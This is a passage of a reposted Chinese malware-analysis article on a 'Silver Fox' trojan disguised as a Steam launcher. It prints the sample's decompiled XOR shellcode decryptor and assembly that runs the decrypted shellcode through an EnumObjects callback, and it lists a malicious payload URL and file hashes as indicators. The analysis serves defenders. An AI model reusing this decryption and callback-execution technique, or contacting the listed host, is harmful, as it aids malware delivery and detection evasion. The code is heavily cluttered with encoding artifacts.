【病毒分析】某银狐伪装Steam客户端启动器”Steam.exe“、”Telegram简体中文语言包“隐蔽投毒

admin 2026-07-12 06:11:04 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该分析揭示了一个伪装成Steam启动器的恶意样本,通过protobuf注册路径隐蔽触发恶意代码,动态下载并解密执行payload。攻击者利用CRT全局初始化阶段插入恶意逻辑,手法隐蔽。建议用户从官方渠道下载软件,并验证文件哈希值。 综合评分: 85 文章分类: 恶意软件,逆向分析


1.8 解密算法与执行阶段分析

下载完成后,样本调用0x5C40A0解密函数:

解密算法分析:

针对下载到RWX内存的shellcode做原地逐字节%20XOR%20变换之后修改buf执行,详情如下:

unsignedint&nbsp;__cdecl&nbsp;sub_5C40A0(%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsigned&nbsp;__int8%20*buf,%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsignedint&nbsp;size,%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsignedint&nbsp;key,%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsignedint&nbsp;mix_counter,%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsignedint&nbsp;xor_stride,%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsignedint&nbsp;unused_seed,%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;unsigned&nbsp;__int8%20shift){%20&nbsp;_BYTE%20v8[8];&nbsp;//%20[esp+4h]%20[ebp-24h]unsignedint&nbsp;v9;&nbsp;//%20[esp+Ch]%20[ebp-1Ch]unsignedint&nbsp;i;&nbsp;//%20[esp+10h]%20[ebp-18h]unsignedint&nbsp;v11;&nbsp;//%20[esp+14h]%20[ebp-14h]unsignedint&nbsp;v12;&nbsp;//%20[esp+18h]%20[ebp-10h]unsignedint&nbsp;v13;&nbsp;//%20[esp+1Ch]%20[ebp-Ch]unsignedint&nbsp;v14;&nbsp;//%20[esp+20h]%20[ebp-8h]unsigned&nbsp;__int8%20v15;&nbsp;//%20[esp+27h]%20[ebp-1h]&nbsp;%20v11%20=%20mix_counter;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20保存mix_counter后面自增/自减,用于混淆&nbsp;%20v9%20=%20key;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20保存key真正xor解密时使用这个值&nbsp;%20v14%20=&nbsp;0xCAFEBABE;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20a%20=%200xCAFEBABE&nbsp;%20v13%20=&nbsp;0xDEADBEEF;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20b%20=%200xDEADBEEF&nbsp;%20v12%20=&nbsp;0x12345678;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20c%20=%200x12345678for&nbsp;(%20i%20=&nbsp;0;%20i%20<%20size;%20++i%20)%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20i%20=%200;开始逐字节遍历shellcode&nbsp;%20{%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20按%20a%20最低位选择扰动分支。if&nbsp;(%20(v14%20&&nbsp;1)%20!=&nbsp;0&nbsp;)%20&nbsp;%20&nbsp;{%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20a为奇数时,再按b最低位选择子分支if&nbsp;(%20(v13%20&&nbsp;1)%20!=&nbsp;0&nbsp;)%20&nbsp;%20&nbsp;%20&nbsp;{%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;v13%20-=%20v14;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20奇数/奇数分支:b%20-=%20a&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20v12%20|=%20v14;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20奇数/奇数分支:c%20|=%20a&nbsp;%20&nbsp;%20&nbsp;%20}%20&nbsp;%20&nbsp;%20&nbsp;else&nbsp;%20&nbsp;%20&nbsp;%20{%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;v12%20+=%20v13%20^%20v14;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20奇数/偶数分支:c%20+=%20b%20^%20a&nbsp;%20&nbsp;%20&nbsp;%20}%20&nbsp;%20&nbsp;}%20&nbsp;%20&nbsp;else&nbsp;%20&nbsp;%20{%20&nbsp;%20&nbsp;%20&nbsp;v14%20+=%20v13;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20偶数分支:a%20+=%20b&nbsp;%20&nbsp;%20&nbsp;%20v13%20^=%20v12;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20偶数分支:b%20^=%20c&nbsp;%20&nbsp;%20}%20&nbsp;%20&nbsp;v14%20^=%20(v12%20>>&nbsp;2)%20|%20(8&nbsp;*%20v13);%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20每轮统一状态混合:a%20^=%20(c%20>>%202)%20|%20(b%20<<%203)&nbsp;%20&nbsp;%20++v11;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20mix_counter++,随后会减回去&nbsp;%20&nbsp;%20--v11;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20mix_counter--,抵消上一条自增&nbsp;%20&nbsp;%20buf[i]%20^=%20v9%20>>%20(shift%20*%20(i%20%&nbsp;4));%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20核心解密:buf[i]%20^=%20key%20>>%20(shift%20*%20(i%20%%204));调用方传入shift=8&nbsp;%20&nbsp;%20++v11;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20mix_counter++,混淆&nbsp;%20&nbsp;%20--v11;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20mix_counter--,抵消上一条自增&nbsp;%20&nbsp;%20v8[0]%20=&nbsp;1;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20构造固定表%20{1,2,3,4,5,6,7,8}&nbsp;%20&nbsp;%20v8[1]%20=&nbsp;2;%20&nbsp;%20&nbsp;v8[2]%20=&nbsp;3;%20&nbsp;%20&nbsp;v8[3]%20=&nbsp;4;%20&nbsp;%20&nbsp;v8[4]%20=&nbsp;5;%20&nbsp;%20&nbsp;v8[5]%20=&nbsp;6;%20&nbsp;%20&nbsp;v8[6]%20=&nbsp;7;%20&nbsp;%20&nbsp;v8[7]%20=&nbsp;8;%20&nbsp;%20&nbsp;v15%20=%20v8[i%20%&nbsp;8];%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;//%20v15%20=%20table[i%20%%208]&nbsp;%20&nbsp;%20v14%20^=%20v15;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20a%20^=%20table[i%20%%208]if&nbsp;(%20!(i%20%&nbsp;5)%20)%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20判断%20i%20%%205%20是否为%200&nbsp;%20&nbsp;%20&nbsp;%20v14%20^=&nbsp;2&nbsp;*%20v12;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;&nbsp;//%20若%20i%20%%205%20==%200,则a%20^=%20c%20<<%201&nbsp;%20}%20&nbsp;return&nbsp;(((v14%20|%20v12)%20+%20(v13%20^%20v14))%20^%20v13)%20-%20(((v14%20|%20v12)%20+%20(v13%20^%20v14))%20&%20v12);//%20关键作用是原地解密buf}

解密完成后,样本最终执行方式如下:

.text:005C3E29%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20push%20&nbsp;%20&nbsp;0.text:005C3E2B%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20call%20&nbsp;%20&nbsp;[ebp+var_198]%20&nbsp;%20&nbsp;%20&nbsp;%20;%20user32!GetDC(0).text:005C3E31%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20mov%20&nbsp;%20&nbsp;%20[ebp+var_120],%20eax.text:005C3E37%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20push%20&nbsp;%20&nbsp;0.text:005C3E39%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20mov%20&nbsp;%20&nbsp;%20ecx,%20[ebp+buf]%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;;%20解密后的%20RWX%20buffer.text:005C3E3C%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20push%20&nbsp;%20&nbsp;ecx.text:005C3E3D%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20push%20&nbsp;%20&nbsp;2.text:005C3E3F.text:005C3E3F%20loc_5C3E3F:%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20;%20CODE%20XREF:%20sub_5D63E0+135↓p.text:005C3E3F%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20;%20sub_60E0F0+99↓p%20....text:005C3E3F%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20mov%20&nbsp;%20&nbsp;%20edx,%20[ebp+var_120].text:005C3E45%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20push%20&nbsp;%20&nbsp;edx.text:005C3E46%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20call%20&nbsp;%20&nbsp;[ebp+var_194]%20&nbsp;%20&nbsp;%20&nbsp;%20;%20gdi32!EnumObjects(hdc,%202,%20buf,%200)

解密后的内存作为EnumObjects回调传入,从而让系统%20API%20在枚举%20GDI%20对象过程中执行远程shellcode。

至此该样本分析结束,建议大伙平时下载软件时擦亮眼睛看清楚其是否属于官方,毕竟现在的网络环境随便搜索个软件都有可能是银狐…

二、附录 2.1%20IOC

|%20类型%20|%20内容%20| |%20—%20|%20—%20| |%20URL%20|%20http://wy29d68v.com/1/lonn.bmp | | MD5 | D58F9D3409892188764DA6F311E915FD | | SHA1 | 98fe8fca4e9d670acffa041de3cc8c5ed8a04d82 | | SHA256 | E0F6227F02D8BF6263938088AF91D3F073DB4A43A529BA46665CB2E90F612799 |

原文链接:https://forum.butian.net/share/4924


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:只会看监控的实习生 菜狗 菜狗《【病毒分析】某银狐伪装Steam客户端启动器”Steam.exe“、”Telegram简体中文语言包“隐蔽投毒》

评论:0   参与:  0